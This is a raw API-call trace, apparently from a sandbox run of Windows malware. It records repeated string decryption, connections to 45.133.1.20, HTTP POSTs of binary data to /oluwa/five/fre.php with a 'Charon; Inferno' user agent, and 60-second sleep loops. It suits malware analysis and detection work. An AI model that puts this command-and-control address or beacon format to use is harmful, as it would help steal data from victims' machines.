CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0135.126] GetProcessHeap () returned 0x6a0000 [0135.126] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0b80 | out: hHeap=0x6a0000) returned 1 [0135.127] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0135.182] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0135.183] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0135.184] CryptDestroyKey (hKey=0x6ad020) returned 1 [0135.184] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0135.185] CryptReleaseContext (hProv=0x6bbc60, dwFlags=0x0) returned 1 [0135.185] GetProcessHeap () returned 0x6a0000 [0135.185] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6bbc60 [0135.186] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0135.186] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0135.187] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0135.188] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0135.192] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0135.192] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0135.193] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0135.194] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0135.194] GetProcessHeap () returned 0x6a0000 [0135.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3648 [0135.194] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0135.194] GetProcessHeap () returned 0x6a0000 [0135.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa00 [0135.194] socket (af=2, type=1, protocol=6) returned 0x25c [0135.195] connect (s=0x25c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0135.221] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0135.221] GetProcessHeap () returned 0x6a0000 [0135.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bbf78 [0135.221] GetProcessHeap () returned 0x6a0000 [0135.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c2708 [0135.224] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0135.225] wvsprintfA (in: param_1=0x6c2708, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0135.225] GetProcessHeap () returned 0x6a0000 [0135.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bc000 [0135.226] GetProcessHeap () returned 0x6a0000 [0135.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0135.226] GetProcessHeap () returned 0x6a0000 [0135.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0135.226] GetProcessHeap () returned 0x6a0000 [0135.226] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c2708 [0135.227] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0135.229] wvsprintfA (in: param_1=0x6c2708, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0135.229] GetProcessHeap () returned 0x6a0000 [0135.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bc0c0 [0135.229] GetProcessHeap () returned 0x6a0000 [0135.229] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0135.229] send (s=0x25c, buf=0x6bc0c0*, len=242, flags=0) returned 242 [0135.230] send (s=0x25c, buf=0x6bb998*, len=159, flags=0) returned 159 [0135.230] GetProcessHeap () returned 0x6a0000 [0135.231] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6b5c98 [0135.231] recv (in: s=0x25c, buf=0x6b5c98, len=4048, flags=0 | out: buf=0x6b5c98*) returned 204 [0135.312] GetProcessHeap () returned 0x6a0000 [0135.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc0c0 | out: hHeap=0x6a0000) returned 1 [0135.313] GetProcessHeap () returned 0x6a0000 [0135.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0135.313] GetProcessHeap () returned 0x6a0000 [0135.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc000 | out: hHeap=0x6a0000) returned 1 [0135.314] GetProcessHeap () returned 0x6a0000 [0135.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbf78 | out: hHeap=0x6a0000) returned 1 [0135.314] closesocket (s=0x25c) returned 0 [0135.315] GetProcessHeap () returned 0x6a0000 [0135.315] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa00 | out: hHeap=0x6a0000) returned 1 [0135.315] GetProcessHeap () returned 0x6a0000 [0135.315] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0135.315] GetProcessHeap () returned 0x6a0000 [0135.315] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0135.316] GetProcessHeap () returned 0x6a0000 [0135.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3648 | out: hHeap=0x6a0000) returned 1 [0135.316] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b5c98, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xf74) returned 0x25c [0135.319] Sleep (dwMilliseconds=0xea60) [0145.360] GetProcessHeap () returned 0x6a0000 [0145.361] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0145.364] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0145.365] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0145.382] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0145.382] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bbc60) returned 1 [0145.397] GetProcessHeap () returned 0x6a0000 [0145.397] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0b80 [0145.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0145.399] CryptImportKey (in: hProv=0x6bbc60, pbData=0x6b0b80, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0145.400] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0145.402] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0145.403] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0145.403] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0145.403] GetProcessHeap () returned 0x6a0000 [0145.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0b80 | out: hHeap=0x6a0000) returned 1 [0145.412] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0145.412] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0145.418] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0145.418] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0145.419] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0145.419] CryptReleaseContext (hProv=0x6bbc60, dwFlags=0x0) returned 1 [0145.419] GetProcessHeap () returned 0x6a0000 [0145.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6bbc60 [0145.423] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0145.423] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0145.424] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0145.426] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0145.427] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0145.427] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0145.428] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0145.428] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0145.428] GetProcessHeap () returned 0x6a0000 [0145.428] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0145.440] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0145.443] GetProcessHeap () returned 0x6a0000 [0145.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0145.444] GetProcessHeap () returned 0x6a0000 [0145.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0145.444] GetProcessHeap () returned 0x6a0000 [0145.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0145.445] GetProcessHeap () returned 0x6a0000 [0145.445] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0145.446] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0145.446] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0145.460] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0145.460] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bbc60) returned 1 [0145.469] GetProcessHeap () returned 0x6a0000 [0145.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0145.470] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0145.470] CryptImportKey (in: hProv=0x6bbc60, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0145.471] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0145.471] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0145.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0145.472] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0145.472] GetProcessHeap () returned 0x6a0000 [0145.473] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0145.475] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0145.476] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0145.477] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0145.477] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0145.478] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0145.478] CryptReleaseContext (hProv=0x6bbc60, dwFlags=0x0) returned 1 [0145.478] GetProcessHeap () returned 0x6a0000 [0145.478] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6bbc60 [0145.479] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0145.479] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0145.480] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0145.480] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0145.481] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0145.482] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0145.482] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0145.483] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0145.483] GetProcessHeap () returned 0x6a0000 [0145.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3648 [0145.483] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3698*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0145.483] GetProcessHeap () returned 0x6a0000 [0145.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa90 [0145.483] socket (af=2, type=1, protocol=6) returned 0x258 [0145.484] connect (s=0x258, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0145.515] FreeAddrInfoW (pAddrInfo=0x6b3698*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0145.515] GetProcessHeap () returned 0x6a0000 [0145.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bc088 [0145.515] GetProcessHeap () returned 0x6a0000 [0145.516] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c2708 [0145.516] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0145.519] wvsprintfA (in: param_1=0x6c2708, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0145.519] GetProcessHeap () returned 0x6a0000 [0145.519] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bc110 [0145.519] GetProcessHeap () returned 0x6a0000 [0145.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0145.520] GetProcessHeap () returned 0x6a0000 [0145.520] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0145.520] GetProcessHeap () returned 0x6a0000 [0145.520] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c2708 [0145.526] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0145.527] wvsprintfA (in: param_1=0x6c2708, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0145.527] GetProcessHeap () returned 0x6a0000 [0145.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bc1d0 [0145.528] GetProcessHeap () returned 0x6a0000 [0145.528] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c2708 | out: hHeap=0x6a0000) returned 1 [0145.528] send (s=0x258, buf=0x6bc1d0*, len=242, flags=0) returned 242 [0145.535] send (s=0x258, buf=0x6bb998*, len=159, flags=0) returned 159 [0145.536] GetProcessHeap () returned 0x6a0000 [0145.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6b5c98 [0145.536] recv (in: s=0x258, buf=0x6b5c98, len=4048, flags=0 | out: buf=0x6b5c98*) returned 204 [0145.612] GetProcessHeap () returned 0x6a0000 [0145.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc1d0 | out: hHeap=0x6a0000) returned 1 [0145.613] GetProcessHeap () returned 0x6a0000 [0145.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0145.614] GetProcessHeap () returned 0x6a0000 [0145.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc110 | out: hHeap=0x6a0000) returned 1 [0145.615] GetProcessHeap () returned 0x6a0000 [0145.616] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bc088 | out: hHeap=0x6a0000) returned 1 [0145.616] closesocket (s=0x258) returned 0 [0145.619] GetProcessHeap () returned 0x6a0000 [0145.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa90 | out: hHeap=0x6a0000) returned 1 [0145.619] GetProcessHeap () returned 0x6a0000 [0145.619] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0145.620] GetProcessHeap () returned 0x6a0000 [0145.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0145.620] GetProcessHeap () returned 0x6a0000 [0145.620] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3648 | out: hHeap=0x6a0000) returned 1 [0145.621] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b5c98, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xe10) returned 0x258 [0145.624] Sleep (dwMilliseconds=0xea60) [0155.668] GetProcessHeap () returned 0x6a0000 [0155.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0155.674] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0155.675] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0155.691] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0155.692] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bbc60) returned 1 [0155.703] GetProcessHeap () returned 0x6a0000 [0155.703] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0b80 [0155.704] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0155.704] CryptImportKey (in: hProv=0x6bbc60, pbData=0x6b0b80, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0155.707] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0155.708] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0155.708] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0155.708] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0155.709] GetProcessHeap () returned 0x6a0000 [0155.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0b80 | out: hHeap=0x6a0000) returned 1 [0155.710] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0155.710] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0155.715] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0155.715] CryptDestroyKey (hKey=0x6ad020) returned 1 [0155.718] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0155.718] CryptReleaseContext (hProv=0x6bbc60, dwFlags=0x0) returned 1 [0155.718] GetProcessHeap () returned 0x6a0000 [0155.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6bbc60 [0155.718] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0155.719] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0155.720] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0155.721] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0155.722] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0155.722] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0155.723] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0155.723] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0155.723] GetProcessHeap () returned 0x6a0000 [0155.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3648 [0155.736] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0155.737] GetProcessHeap () returned 0x6a0000 [0155.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3648 | out: hHeap=0x6a0000) returned 1 [0155.738] GetProcessHeap () returned 0x6a0000 [0155.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0155.738] GetProcessHeap () returned 0x6a0000 [0155.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0155.739] GetProcessHeap () returned 0x6a0000 [0155.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0155.739] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0155.740] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0155.748] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0155.748] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bbc60) returned 1 [0155.755] GetProcessHeap () returned 0x6a0000 [0155.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0b80 [0155.756] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0155.756] CryptImportKey (in: hProv=0x6bbc60, pbData=0x6b0b80, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0155.757] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0155.758] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0155.758] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0155.759] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0155.759] GetProcessHeap () returned 0x6a0000 [0155.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0b80 | out: hHeap=0x6a0000) returned 1 [0155.760] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0155.760] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0155.761] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0155.761] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0155.761] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0155.762] CryptReleaseContext (hProv=0x6bbc60, dwFlags=0x0) returned 1 [0155.762] GetProcessHeap () returned 0x6a0000 